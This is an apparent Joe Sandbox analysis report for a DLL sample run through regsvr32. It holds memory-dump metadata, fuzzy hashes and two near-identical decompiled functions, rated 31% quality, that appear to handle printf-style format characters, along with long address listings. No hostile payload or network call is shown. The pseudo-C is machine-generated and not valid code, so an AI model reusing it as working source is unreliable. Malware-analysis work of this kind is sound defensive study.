                                                                                                              0x18002c825
                                                                                                              0x18002c827
                                                                                                              0x18002c82e
                                                                                                              0x18002c83b
                                                                                                              0x18002c843
                                                                                                              0x18002c848
                                                                                                              0x18002c84f
                                                                                                              0x18002c851
                                                                                                              0x18002c853
                                                                                                              0x18002c856
                                                                                                              0x18002c85f
                                                                                                              0x18002c863
                                                                                                              0x18002c86a
                                                                                                              0x18002c86f
                                                                                                              0x18002c874
                                                                                                              0x18002c878
                                                                                                              0x18002c883
                                                                                                              0x18002c885
                                                                                                              0x18002c88a
                                                                                                              0x18002c88c
                                                                                                              0x18002c897
                                                                                                              0x18002c89d
                                                                                                              0x18002c8a1
                                                                                                              0x18002c8a6
                                                                                                              0x18002c8a8
                                                                                                              0x18002c8ad
                                                                                                              0x18002c8af
                                                                                                              0x18002c8b9
                                                                                                              0x18002c8bf
                                                                                                              0x18002c8c7
                                                                                                              0x18002c8c9
                                                                                                              0x18002c8cf
                                                                                                              0x18002c8fd

                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000007.00000002.1495164869.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                              • Associated: 00000007.00000002.1495159677.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.1495291147.000000018005D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.1495394141.0000000180070000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.1495399859.0000000180073000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.1495658671.00000001800D5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_7_2_180000000_regsvr32.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 8a8d41fc61695c878332158b9cac74ba3b8bcce55a21fb0a36cc0bbcf1e3d647
                                                                                                              • Instruction ID: b2487138579ef4ceedcf3a30791ad794459cdfdcb9ab9230d20447d553ae8756
                                                                                                              • Opcode Fuzzy Hash: 8a8d41fc61695c878332158b9cac74ba3b8bcce55a21fb0a36cc0bbcf1e3d647
                                                                                                              • Instruction Fuzzy Hash: 71D1DE7660464C8AEBAB8F298004BED27A1F70DBC8F54D206EE49477D5CF35CA4AC742
                                                                                                              Uniqueness

                                                                                                              Uniqueness Score: -1.00%

                                                                                                              Function 000000018002C150 Relevance: .3, Instructions: 317COMMONCrypto
                                                                                                              Download Yara Rule
                                                                                                              C-Code - Quality: 31%
                                                                                                              			E0000000118002C150(void* __edi, long long __rbx, long long __rcx, void* __rdx, long long __rdi, long long __rsi, void* __r8, long long _a16, long long _a24, long long _a32) {
				void* _v40;
				signed int _v56;
				char _v68;
				char _v70;
				signed int _v72;
				long long _v88;
				void* __rbp;
				intOrPtr _t108;
				void* _t111;
				void* _t115;
				void* _t137;
				unsigned int _t144;
				signed char _t145;
				unsigned int _t150;
				signed int _t156;
				void* _t166;
				void* _t169;
				void* _t170;
				signed long long _t228;
				long long _t244;
				intOrPtr* _t249;
				intOrPtr* _t253;
				void* _t258;
				intOrPtr _t261;
				intOrPtr _t265;
				signed int* _t267;
				void* _t271;
				void* _t272;
				intOrPtr _t276;
				void* _t283;
				intOrPtr* _t284;

				_t269 = __rsi;
				_t166 = __edi;
				_a16 = __rbx;
				_a24 = __rsi;
				_a32 = __rdi;
				_t271 = _t272;
				_t273 = _t272 - 0x50;
				_t228 =  *0x80070098; // 0xde2ac6aee6eb
				_v56 = _t228 ^ _t272 - 0x00000050;
				_t108 =  *((intOrPtr*)(__rcx + 0x39));
				_t244 = __rcx;
				r13d = 1;
				dil = 0x78;
				sil = 0x58;
				r14b = 0x41;
				_t170 = _t108 - 0x64;
				if (_t170 > 0) goto 0x8002c1f3;
				if (_t170 == 0) goto 0x8002c256;
				if (_t108 == r14b) goto 0x8002c263;
				if (_t108 == 0x43) goto 0x8002c1d6;
				if (_t108 - 0x44 <= 0) goto 0x8002c26c;
				if (_t108 - 0x47 <= 0) goto 0x8002c263;
				if (_t108 == 0x53) goto 0x8002c218;
				if (_t108 == sil) goto 0x8002c1e9;
				if (_t108 == 0x5a) goto 0x8002c1e2;
				if (_t108 == 0x61) goto 0x8002c263;
				if (_t108 != 0x63) goto 0x8002c26c;
				E000000011800312C0(_t108, _t108 - 0x63, __rcx);
				goto 0x8002c268;
				E0000000118002EE44(__rcx);
				goto 0x8002c268;
				_t111 = E0000000118001E91C(r13b, __rcx, __rcx, __rsi, _t271);
				goto 0x8002c268;
				if (_t111 - 0x67 <= 0) goto 0x8002c263;
				if (_t111 == 0x69) goto 0x8002c256;
				if (_t111 == 0x6e) goto 0x8002c24f;
				if (_t111 == 0x6f) goto 0x8002c22f;
				if (_t111 == 0x70) goto 0x8002c21f;
				if (_t111 == 0x73) goto 0x8002c218;
				if (_t111 == 0x75) goto 0x8002c25a;
				if (_t111 != dil) goto 0x8002c26c;
				goto 0x8002c1ec;
				E0000000118003286C(__rcx);
				goto 0x8002c268;
				 *((intOrPtr*)(__rcx + 0x30)) = 0x10;
				 *((intOrPtr*)(__rcx + 0x34)) = 0xb;
				goto 0x8002c1e9;
				_t144 =  *(__rcx + 0x28);
				if ((r13b & _t144 >> 0x00000005) == 0) goto 0x8002c243;
				asm("bts ecx, 0x7");
				 *(__rcx + 0x28) = _t144;
				0x8001b90c();
				goto 0x8002c268;
				0x80031d30();
				goto 0x8002c268;
				 *(__rcx + 0x28) =  *(__rcx + 0x28) | 0x00000010;
				_t115 = E0000000118001D114(0, __rcx, __rcx, _t269, _t271);
				goto 0x8002c268;
				0x8002fa10();
				if (_t115 != 0) goto 0x8002c273;
				goto 0x8002c4f2;
				if ( *((char*)(__rcx + 0x38)) != 0) goto 0x8002c4ef;
				_t145 =  *(__rcx + 0x28);
				_v72 = 0;
				_v70 = 0;
				if ((r13b & 0) == 0) goto 0x8002c2c0;
				if ((r13b & 0) == 0) goto 0x8002c2a5;
				_v72 = 0x2d;
				goto 0x8002c2bd;
				if ((r13b & _t145) == 0) goto 0x8002c2b0;
				_v72 = 0x2b;
				goto 0x8002c2bd;
				if ((r13b & 0) == 0) goto 0x8002c2c0;
				_v72 = 0x20;
				_t258 = _t283;
				r8b =  *((intOrPtr*)(__rcx + 0x39));
				if ((r8b - sil & 0x000000df) != 0) goto 0x8002c2dd;
				if ((r13b & _t145 >> 0x00000005) == 0) goto 0x8002c2dd;
				r9b = r13b;
				goto 0x8002c2e0;
				r9b = 0;
				_t129 = r8b - r14b;
				if (r9b != 0) goto 0x8002c2f4;
				if ((r8b - r14b & 0xffffff00 | (_t129 & 0x000000df) == 0x00000000) == 0) goto 0x8002c30f;
				 *((char*)(_t271 + _t258 - 0x20)) = 0x30;
				if (r8b == sil) goto 0x8002c303;
				if (r8b != r14b) goto 0x8002c306;
				dil = sil;
				 *((intOrPtr*)(_t271 + _t258 - 0x1f)) = dil;
				_t169 =  *((intOrPtr*)(__rcx + 0x2c)) -  *((intOrPtr*)(__rcx + 0x48));
				if ((_t145 & 0x0000000c) != 0) goto 0x8002c37b;
				r9d = 0;
				if (_t169 <= 0) goto 0x8002c37b;
				_t276 =  *((intOrPtr*)(__rcx + 0x460));
				if ( *((intOrPtr*)(_t276 + 0x10)) !=  *((intOrPtr*)(_t276 + 8))) goto 0x8002c34a;
				if ( *((char*)(_t276 + 0x18)) == 0) goto 0x8002c342;
				goto 0x8002c345;
				 *(__rcx + 0x20) =  *(__rcx + 0x20) + 0x00000001 | 0xffffffff;
				goto 0x8002c36e;
				 *(__rcx + 0x20) = __rcx + 1;
				 *((intOrPtr*)(_t276 + 0x10)) =  *((intOrPtr*)(_t276 + 0x10)) + _t283;
				 *((char*)( *((intOrPtr*)( *((intOrPtr*)(__rcx + 0x460)))))) = 0x20;
				 *((intOrPtr*)( *((intOrPtr*)(__rcx + 0x460)))) =  *((intOrPtr*)( *((intOrPtr*)(__rcx + 0x460)))) + _t283;
				if ( *(__rcx + 0x20) == 0xffffffff) goto 0x8002c37b;
				r9d = r9d + r13d;
				if (r9d - _t169 < 0) goto 0x8002c326;
				_t60 = _t244 + 0x20; // 0x98
				_t267 = _t60;
				r8d = 0;
				_v88 =  *((intOrPtr*)(__rcx + 8));
				_t62 = _t244 + 0x460; // 0x4d8
				_t284 = _t62;
				_t249 = _t284;
				E000000011800360A4(__rcx + 1, _t166, _t169, __rcx, _t249, _t267, _t269, _t271, _t267);
				_t150 =  *(__rcx + 0x28);
				if ((r13b & _t150 >> 0x00000003) == 0) goto 0x8002c404;
				if ((r13b & _t150 >> 0x00000002) != 0) goto 0x8002c404;
				r8d = 0;
				if (_t169 <= 0) goto 0x8002c404;
				_t261 =  *_t284;
				if ( *((intOrPtr*)(_t261 + 0x10)) !=  *((intOrPtr*)(_t261 + 8))) goto 0x8002c3dd;
				if ( *((char*)(_t261 + 0x18)) == 0) goto 0x8002c3d6;
				goto 0x8002c3d9;
				 *_t267 =  *_t267 + 0x00000001 | 0xffffffff;
				goto 0x8002c3f7;
				 *_t267 = _t249 + 1;
				 *((intOrPtr*)(_t261 + 0x10)) =  *((intOrPtr*)(_t261 + 0x10)) + _t283;
				 *((char*)( *((intOrPtr*)( *_t284)))) = 0x30;
				 *((intOrPtr*)( *_t284)) =  *((intOrPtr*)( *_t284)) + _t283;
				if ( *_t267 == 0xffffffff) goto 0x8002c404;
				r8d = r8d + r13d;
				if (r8d - _t169 < 0) goto 0x8002c3bf;
				if ( *((char*)(__rcx + 0x4c)) == 0) goto 0x8002c476;
				if ( *((intOrPtr*)(__rcx + 0x48)) <= 0) goto 0x8002c476;
				r14d = 0;
				_t79 =  &_v68; // -27
				r9d =  *( *(__rcx + 0x40)) & 0x0000ffff;
				_t80 =  &_v72; // -31
				_v72 = _v72 & 0x00000000;
				r8d = 6;
				_v88 =  *((intOrPtr*)(__rcx + 8));
				if (E00000001180040970(__rcx, _t80, _t79, _t271, _t276) != 0) goto 0x8002c471;
				r8d = _v72;
				if (r8d == 0) goto 0x8002c471;
				_v88 =  *((intOrPtr*)(_t244 + 8));
				_t137 = E000000011800360A4(_t136, _t166, _t169, _t244, _t284, _t267, _t269, _t271, _t267);
				r14d = r14d + r13d;
				if (r14d !=  *(_t244 + 0x48)) goto 0x8002c417;
				goto 0x8002c492;
				 *_t267 =  *_t267 | 0xffffffff;
				goto 0x8002c492;
				r8d =  *(_t244 + 0x48);
				_t253 = _t284;
				_v88 =  *((intOrPtr*)(_t244 + 8));
				E000000011800360A4(_t137, _t166, _t169, _t244, _t253, _t267, _t269, _t271, _t267);
				_t156 =  *_t267;
				if (_t156 < 0) goto 0x8002c4ef;
				if ((r13b &  *(_t244 + 0x28) >> 0x00000002) == 0) goto 0x8002c4ef;
				r8d = 0;
				if (_t169 <= 0) goto 0x8002c4ef;
				_t265 =  *_t284;
				if ( *((intOrPtr*)(_t265 + 0x10)) !=  *((intOrPtr*)(_t265 + 8))) goto 0x8002c4c8;
				if ( *((char*)(_t265 + 0x18)) == 0) goto 0x8002c4c1;
				goto 0x8002c4c4;
				 *_t267 = _t156 + 0x00000001 | 0xffffffff;
				goto 0x8002c4e2;
				 *_t267 = _t253 + 1;
				 *((intOrPtr*)(_t265 + 0x10)) =  *((intOrPtr*)(_t265 + 0x10)) + _t283;
				 *((char*)( *((intOrPtr*)( *_t284)))) = 0x20;
				 *((intOrPtr*)( *_t284)) =  *((intOrPtr*)( *_t284)) + _t283;
				if ( *_t267 == 0xffffffff) goto 0x8002c4ef;
				r8d = r8d + r13d;
				if (r8d - _t169 < 0) goto 0x8002c4aa;
				return E000000011800028F0(r13b,  *_t267, _v56 ^ _t273);
			}


































                                                                                                              0x18002c150
                                                                                                              0x18002c150
                                                                                                              0x18002c150
                                                                                                              0x18002c155
                                                                                                              0x18002c15a
                                                                                                              0x18002c168
                                                                                                              0x18002c16b
                                                                                                              0x18002c16f
                                                                                                              0x18002c179
                                                                                                              0x18002c17d
                                                                                                              0x18002c180
                                                                                                              0x18002c183
                                                                                                              0x18002c189
                                                                                                              0x18002c18c
                                                                                                              0x18002c18f
                                                                                                              0x18002c192
                                                                                                              0x18002c194
                                                                                                              0x18002c196
                                                                                                              0x18002c19f
                                                                                                              0x18002c1a7
                                                                                                              0x18002c1ab
                                                                                                              0x18002c1b3
                                                                                                              0x18002c1bb
                                                                                                              0x18002c1c0
                                                                                                              0x18002c1c4
                                                                                                              0x18002c1c8
                                                                                                              0x18002c1d0
                                                                                                              0x18002c1d8
                                                                                                              0x18002c1dd
                                                                                                              0x18002c1e2
                                                                                                              0x18002c1e7
                                                                                                              0x18002c1ec
                                                                                                              0x18002c1f1
                                                                                                              0x18002c1f5
                                                                                                              0x18002c1f9
                                                                                                              0x18002c1fd
                                                                                                              0x18002c201
                                                                                                              0x18002c205
                                                                                                              0x18002c209
                                                                                                              0x18002c20d
                                                                                                              0x18002c212
                                                                                                              0x18002c216
                                                                                                              0x18002c218
                                                                                                              0x18002c21d
                                                                                                              0x18002c21f
                                                                                                              0x18002c226
                                                                                                              0x18002c22d
                                                                                                              0x18002c22f
                                                                                                              0x18002c23a
                                                                                                              0x18002c23c
                                                                                                              0x18002c240
                                                                                                              0x18002c248
                                                                                                              0x18002c24d
                                                                                                              0x18002c24f
                                                                                                              0x18002c254
                                                                                                              0x18002c256
                                                                                                              0x18002c25c
                                                                                                              0x18002c261
                                                                                                              0x18002c263
                                                                                                              0x18002c26a
                                                                                                              0x18002c26e
                                                                                                              0x18002c277
                                                                                                              0x18002c27d
                                                                                                              0x18002c282
                                                                                                              0x18002c288
                                                                                                              0x18002c293
                                                                                                              0x18002c29d
                                                                                                              0x18002c29f
                                                                                                              0x18002c2a3
                                                                                                              0x18002c2a8
                                                                                                              0x18002c2aa
                                                                                                              0x18002c2ae
                                                                                                              0x18002c2b7
                                                                                                              0x18002c2b9
                                                                                                              0x18002c2bd
                                                                                                              0x18002c2c0
                                                                                                              0x18002c2cc
                                                                                                              0x18002c2d6
                                                                                                              0x18002c2d8
                                                                                                              0x18002c2db
                                                                                                              0x18002c2dd
                                                                                                              0x18002c2e3
                                                                                                              0x18002c2ee
                                                                                                              0x18002c2f2
                                                                                                              0x18002c2f4
                                                                                                              0x18002c2fc
                                                                                                              0x18002c301
                                                                                                              0x18002c303
                                                                                                              0x18002c306
                                                                                                              0x18002c314
                                                                                                              0x18002c31a
                                                                                                              0x18002c31c
                                                                                                              0x18002c321
                                                                                                              0x18002c326
                                                                                                              0x18002c335
                                                                                                              0x18002c33c
                                                                                                              0x18002c340
                                                                                                              0x18002c345
                                                                                                              0x18002c348
                                                                                                              0x18002c34d
                                                                                                              0x18002c350
                                                                                                              0x18002c35e
                                                                                                              0x18002c368
                                                                                                              0x18002c371
                                                                                                              0x18002c373
                                                                                                              0x18002c379
                                                                                                              0x18002c37f
                                                                                                              0x18002c37f
                                                                                                              0x18002c383
                                                                                                              0x18002c386
                                                                                                              0x18002c38b
                                                                                                              0x18002c38b
                                                                                                              0x18002c395
                                                                                                              0x18002c39c
                                                                                                              0x18002c3a1
                                                                                                              0x18002c3ac
                                                                                                              0x18002c3b4
                                                                                                              0x18002c3b6
                                                                                                              0x18002c3bb
                                                                                                              0x18002c3bf
                                                                                                              0x18002c3ca
                                                                                                              0x18002c3d0
                                                                                                              0x18002c3d4
                                                                                                              0x18002c3d9
                                                                                                              0x18002c3db
                                                                                                              0x18002c3e0
                                                                                                              0x18002c3e2
                                                                                                              0x18002c3ec
                                                                                                              0x18002c3f2
                                                                                                              0x18002c3fa
                                                                                                              0x18002c3fc
                                                                                                              0x18002c402
                                                                                                              0x18002c408
                                                                                                              0x18002c40e
                                                                                                              0x18002c414
                                                                                                              0x18002c41b
                                                                                                              0x18002c41f
                                                                                                              0x18002c424
                                                                                                              0x18002c428
                                                                                                              0x18002c431
                                                                                                              0x18002c437
                                                                                                              0x18002c443
                                                                                                              0x18002c445
                                                                                                              0x18002c44c
                                                                                                              0x18002c459
                                                                                                              0x18002c461
                                                                                                              0x18002c466
                                                                                                              0x18002c46d
                                                                                                              0x18002c46f
                                                                                                              0x18002c471
                                                                                                              0x18002c474
                                                                                                              0x18002c47d
                                                                                                              0x18002c481
                                                                                                              0x18002c488
                                                                                                              0x18002c48d
                                                                                                              0x18002c492
                                                                                                              0x18002c496
                                                                                                              0x18002c4a1
                                                                                                              0x18002c4a3
                                                                                                              0x18002c4a8
                                                                                                              0x18002c4aa
                                                                                                              0x18002c4b5
                                                                                                              0x18002c4bb
                                                                                                              0x18002c4bf
                                                                                                              0x18002c4c4
                                                                                                              0x18002c4c6
                                                                                                              0x18002c4cb
                                                                                                              0x18002c4cd
                                                                                                              0x18002c4d7
                                                                                                              0x18002c4dd
                                                                                                              0x18002c4e5
                                                                                                              0x18002c4e7
                                                                                                              0x18002c4ed
                                                                                                              0x18002c51b

                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000007.00000002.1495164869.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                              • Associated: 00000007.00000002.1495159677.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.1495291147.000000018005D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.1495394141.0000000180070000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.1495399859.0000000180073000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.1495658671.00000001800D5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_7_2_180000000_regsvr32.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: ae38091a4e9164ee0da1e0840a1ce4f6a92cc278b8cf9f32f03f71371aba9385
                                                                                                              • Instruction ID: 0c851bea1a75168f7d481c0b78bcc101433a59e6be09235584b3e2cb2822fb5c
                                                                                                              • Opcode Fuzzy Hash: ae38091a4e9164ee0da1e0840a1ce4f6a92cc278b8cf9f32f03f71371aba9385
                                                                                                              • Instruction Fuzzy Hash: 98D1CD7260464C86EBAB8B698010BEE27A1E74DBC8F14C206EE59476D5DF35CA4EC352
                                                                                                              Uniqueness

                                                                                                              Uniqueness Score: -1.00%

                                                                                                              Function 000000018002C900 Relevance: .3, Instructions: 317COMMONCrypto
                                                                                                              Download Yara Rule
                                                                                                              C-Code - Quality: 31%
                                                                                                              			E0000000118002C900(void* __edi, long long __rbx, long long __rcx, void* __rdx, long long __rdi, long long __rsi, void* __r8, long long _a16, long long _a24, long long _a32) {
				void* _v40;
				signed int _v56;
				char _v68;
				char _v70;
				signed int _v72;
				long long _v88;
				void* __rbp;
				intOrPtr _t108;
				void* _t111;
				void* _t115;
				void* _t137;
				unsigned int _t144;
				signed char _t145;
				unsigned int _t150;
				signed int _t156;
				void* _t166;
				void* _t169;
				void* _t170;
				signed long long _t228;
				long long _t244;
				intOrPtr* _t249;
				intOrPtr* _t253;
				void* _t258;
				intOrPtr _t261;
				intOrPtr _t265;
				signed int* _t267;
				void* _t271;
				void* _t272;
				intOrPtr _t276;
				void* _t283;
				intOrPtr* _t284;

				_t269 = __rsi;
				_t166 = __edi;
				_a16 = __rbx;
				_a24 = __rsi;
				_a32 = __rdi;
				_t271 = _t272;
				_t273 = _t272 - 0x50;
				_t228 =  *0x80070098; // 0xde2ac6aee6eb
				_v56 = _t228 ^ _t272 - 0x00000050;
				_t108 =  *((intOrPtr*)(__rcx + 0x39));
				_t244 = __rcx;
				r13d = 1;
				dil = 0x78;
				sil = 0x58;
				r14b = 0x41;
				_t170 = _t108 - 0x64;
				if (_t170 > 0) goto 0x8002c9a3;
				if (_t170 == 0) goto 0x8002ca06;
				if (_t108 == r14b) goto 0x8002ca13;
				if (_t108 == 0x43) goto 0x8002c986;
				if (_t108 - 0x44 <= 0) goto 0x8002ca1c;
				if (_t108 - 0x47 <= 0) goto 0x8002ca13;
				if (_t108 == 0x53) goto 0x8002c9c8;
				if (_t108 == sil) goto 0x8002c999;
				if (_t108 == 0x5a) goto 0x8002c992;
				if (_t108 == 0x61) goto 0x8002ca13;
				if (_t108 != 0x63) goto 0x8002ca1c;
				E00000001180031490(_t108, _t108 - 0x63, __rcx);
				goto 0x8002ca18;
				E0000000118002EF64(__rcx);
				goto 0x8002ca18;
				_t111 = E0000000118001ED30(r13b, __rcx, __rcx, __rsi, _t271);
				goto 0x8002ca18;
				if (_t111 - 0x67 <= 0) goto 0x8002ca13;
				if (_t111 == 0x69) goto 0x8002ca06;
				if (_t111 == 0x6e) goto 0x8002c9ff;
				if (_t111 == 0x6f) goto 0x8002c9df;
				if (_t111 == 0x70) goto 0x8002c9cf;
				if (_t111 == 0x73) goto 0x8002c9c8;
				if (_t111 == 0x75) goto 0x8002ca0a;
				if (_t111 != dil) goto 0x8002ca1c;
				goto 0x8002c99c;
				E000000011800329BC(__rcx);
				goto 0x8002ca18;
				 *((intOrPtr*)(__rcx + 0x30)) = 0x10;
				 *((intOrPtr*)(__rcx + 0x34)) = 0xb;
				goto 0x8002c999;
				_t144 =  *(__rcx + 0x28);
				if ((r13b & _t144 >> 0x00000005) == 0) goto 0x8002c9f3;
				asm("bts ecx, 0x7");
				 *(__rcx + 0x28) = _t144;
				0x8001bd20();
				goto 0x8002ca18;
				0x80031ec8();
				goto 0x8002ca18;
				 *(__rcx + 0x28) =  *(__rcx + 0x28) | 0x00000010;
				_t115 = E0000000118001D528(0, __rcx, __rcx, _t269, _t271);
				goto 0x8002ca18;
				0x8002fed8();
				if (_t115 != 0) goto 0x8002ca23;
				goto 0x8002cca2;
				if ( *((char*)(__rcx + 0x38)) != 0) goto 0x8002cc9f;
				_t145 =  *(__rcx + 0x28);
				_v72 = 0;
				_v70 = 0;
				if ((r13b & 0) == 0) goto 0x8002ca70;
				if ((r13b & 0) == 0) goto 0x8002ca55;
				_v72 = 0x2d;
				goto 0x8002ca6d;
				if ((r13b & _t145) == 0) goto 0x8002ca60;
				_v72 = 0x2b;
				goto 0x8002ca6d;
				if ((r13b & 0) == 0) goto 0x8002ca70;
				_v72 = 0x20;
				_t258 = _t283;
				r8b =  *((intOrPtr*)(__rcx + 0x39));
				if ((r8b - sil & 0x000000df) != 0) goto 0x8002ca8d;
				if ((r13b & _t145 >> 0x00000005) == 0) goto 0x8002ca8d;
				r9b = r13b;
				goto 0x8002ca90;
				r9b = 0;
				_t129 = r8b - r14b;
				if (r9b != 0) goto 0x8002caa4;
				if ((r8b - r14b & 0xffffff00 | (_t129 & 0x000000df) == 0x00000000) == 0) goto 0x8002cabf;
				 *((char*)(_t271 + _t258 - 0x20)) = 0x30;
				if (r8b == sil) goto 0x8002cab3;
				if (r8b != r14b) goto 0x8002cab6;
				dil = sil;
				 *((intOrPtr*)(_t271 + _t258 - 0x1f)) = dil;
				_t169 =  *((intOrPtr*)(__rcx + 0x2c)) -  *((intOrPtr*)(__rcx + 0x48));
				if ((_t145 & 0x0000000c) != 0) goto 0x8002cb2b;
				r9d = 0;
				if (_t169 <= 0) goto 0x8002cb2b;
				_t276 =  *((intOrPtr*)(__rcx + 0x460));
				if ( *((intOrPtr*)(_t276 + 0x10)) !=  *((intOrPtr*)(_t276 + 8))) goto 0x8002cafa;
				if ( *((char*)(_t276 + 0x18)) == 0) goto 0x8002caf2;
				goto 0x8002caf5;
				 *(__rcx + 0x20) =  *(__rcx + 0x20) + 0x00000001 | 0xffffffff;
				goto 0x8002cb1e;
				 *(__rcx + 0x20) = __rcx + 1;
				 *((intOrPtr*)(_t276 + 0x10)) =  *((intOrPtr*)(_t276 + 0x10)) + _t283;
				 *((char*)( *((intOrPtr*)( *((intOrPtr*)(__rcx + 0x460)))))) = 0x20;
				 *((intOrPtr*)( *((intOrPtr*)(__rcx + 0x460)))) =  *((intOrPtr*)( *((intOrPtr*)(__rcx + 0x460)))) + _t283;
				if ( *(__rcx + 0x20) == 0xffffffff) goto 0x8002cb2b;
				r9d = r9d + r13d;
				if (r9d - _t169 < 0) goto 0x8002cad6;
				_t60 = _t244 + 0x20; // 0x98
				_t267 = _t60;
				r8d = 0;
				_v88 =  *((intOrPtr*)(__rcx + 8));
				_t62 = _t244 + 0x460; // 0x4d8
				_t284 = _t62;
				_t249 = _t284;
				E000000011800360A4(__rcx + 1, _t166, _t169, __rcx, _t249, _t267, _t269, _t271, _t267);
				_t150 =  *(__rcx + 0x28);
				if ((r13b & _t150 >> 0x00000003) == 0) goto 0x8002cbb4;
				if ((r13b & _t150 >> 0x00000002) != 0) goto 0x8002cbb4;
				r8d = 0;
				if (_t169 <= 0) goto 0x8002cbb4;
				_t261 =  *_t284;
				if ( *((intOrPtr*)(_t261 + 0x10)) !=  *((intOrPtr*)(_t261 + 8))) goto 0x8002cb8d;
				if ( *((char*)(_t261 + 0x18)) == 0) goto 0x8002cb86;
				goto 0x8002cb89;
				 *_t267 =  *_t267 + 0x00000001 | 0xffffffff;
				goto 0x8002cba7;
				 *_t267 = _t249 + 1;
				 *((intOrPtr*)(_t261 + 0x10)) =  *((intOrPtr*)(_t261 + 0x10)) + _t283;
				 *((char*)( *((intOrPtr*)( *_t284)))) = 0x30;
				 *((intOrPtr*)( *_t284)) =  *((intOrPtr*)( *_t284)) + _t283;
				if ( *_t267 == 0xffffffff) goto 0x8002cbb4;
				r8d = r8d + r13d;
				if (r8d - _t169 < 0) goto 0x8002cb6f;
				if ( *((char*)(__rcx + 0x4c)) == 0) goto 0x8002cc26;
				if ( *((intOrPtr*)(__rcx + 0x48)) <= 0) goto 0x8002cc26;
				r14d = 0;
				_t79 =  &_v68; // -27
				r9d =  *( *(__rcx + 0x40)) & 0x0000ffff;
				_t80 =  &_v72; // -31
				_v72 = _v72 & 0x00000000;
				r8d = 6;
				_v88 =  *((intOrPtr*)(__rcx + 8));
				if (E00000001180040970(__rcx, _t80, _t79, _t271, _t276) != 0) goto 0x8002cc21;
				r8d = _v72;
				if (r8d == 0) goto 0x8002cc21;
				_v88 =  *((intOrPtr*)(_t244 + 8));
				_t137 = E000000011800360A4(_t136, _t166, _t169, _t244, _t284, _t267, _t269, _t271, _t267);
				r14d = r14d + r13d;
				if (r14d !=  *(_t244 + 0x48)) goto 0x8002cbc7;
				goto 0x8002cc42;
				 *_t267 =  *_t267 | 0xffffffff;
				goto 0x8002cc42;
				r8d =  *(_t244 + 0x48);
				_t253 = _t284;
				_v88 =  *((intOrPtr*)(_t244 + 8));
				E000000011800360A4(_t137, _t166, _t169, _t244, _t253, _t267, _t269, _t271, _t267);
				_t156 =  *_t267;
				if (_t156 < 0) goto 0x8002cc9f;
				if ((r13b &  *(_t244 + 0x28) >> 0x00000002) == 0) goto 0x8002cc9f;
				r8d = 0;
				if (_t169 <= 0) goto 0x8002cc9f;
				_t265 =  *_t284;
				if ( *((intOrPtr*)(_t265 + 0x10)) !=  *((intOrPtr*)(_t265 + 8))) goto 0x8002cc78;
				if ( *((char*)(_t265 + 0x18)) == 0) goto 0x8002cc71;
				goto 0x8002cc74;
				 *_t267 = _t156 + 0x00000001 | 0xffffffff;
				goto 0x8002cc92;
				 *_t267 = _t253 + 1;
				 *((intOrPtr*)(_t265 + 0x10)) =  *((intOrPtr*)(_t265 + 0x10)) + _t283;
				 *((char*)( *((intOrPtr*)( *_t284)))) = 0x20;
				 *((intOrPtr*)( *_t284)) =  *((intOrPtr*)( *_t284)) + _t283;
				if ( *_t267 == 0xffffffff) goto 0x8002cc9f;
				r8d = r8d + r13d;
				if (r8d - _t169 < 0) goto 0x8002cc5a;
				return E000000011800028F0(r13b,  *_t267, _v56 ^ _t273);
			}


































                                                                                                              0x18002c900
                                                                                                              0x18002c900
                                                                                                              0x18002c900
                                                                                                              0x18002c905
                                                                                                              0x18002c90a
                                                                                                              0x18002c918
                                                                                                              0x18002c91b
                                                                                                              0x18002c91f
                                                                                                              0x18002c929
                                                                                                              0x18002c92d
                                                                                                              0x18002c930
                                                                                                              0x18002c933
                                                                                                              0x18002c939
                                                                                                              0x18002c93c
                                                                                                              0x18002c93f
                                                                                                              0x18002c942
                                                                                                              0x18002c944
                                                                                                              0x18002c946
                                                                                                              0x18002c94f
                                                                                                              0x18002c957
                                                                                                              0x18002c95b
                                                                                                              0x18002c963
                                                                                                              0x18002c96b
                                                                                                              0x18002c970
                                                                                                              0x18002c974
                                                                                                              0x18002c978
                                                                                                              0x18002c980
                                                                                                              0x18002c988
                                                                                                              0x18002c98d
                                                                                                              0x18002c992
                                                                                                              0x18002c997
                                                                                                              0x18002c99c
                                                                                                              0x18002c9a1
                                                                                                              0x18002c9a5
                                                                                                              0x18002c9a9
                                                                                                              0x18002c9ad
                                                                                                              0x18002c9b1
                                                                                                              0x18002c9b5
                                                                                                              0x18002c9b9
                                                                                                              0x18002c9bd
                                                                                                              0x18002c9c2
                                                                                                              0x18002c9c6
                                                                                                              0x18002c9c8
                                                                                                              0x18002c9cd
                                                                                                              0x18002c9cf
                                                                                                              0x18002c9d6
                                                                                                              0x18002c9dd
                                                                                                              0x18002c9df
                                                                                                              0x18002c9ea
                                                                                                              0x18002c9ec
                                                                                                              0x18002c9f0
                                                                                                              0x18002c9f8
                                                                                                              0x18002c9fd
                                                                                                              0x18002c9ff
                                                                                                              0x18002ca04
                                                                                                              0x18002ca06
                                                                                                              0x18002ca0c
                                                                                                              0x18002ca11
                                                                                                              0x18002ca13
                                                                                                              0x18002ca1a
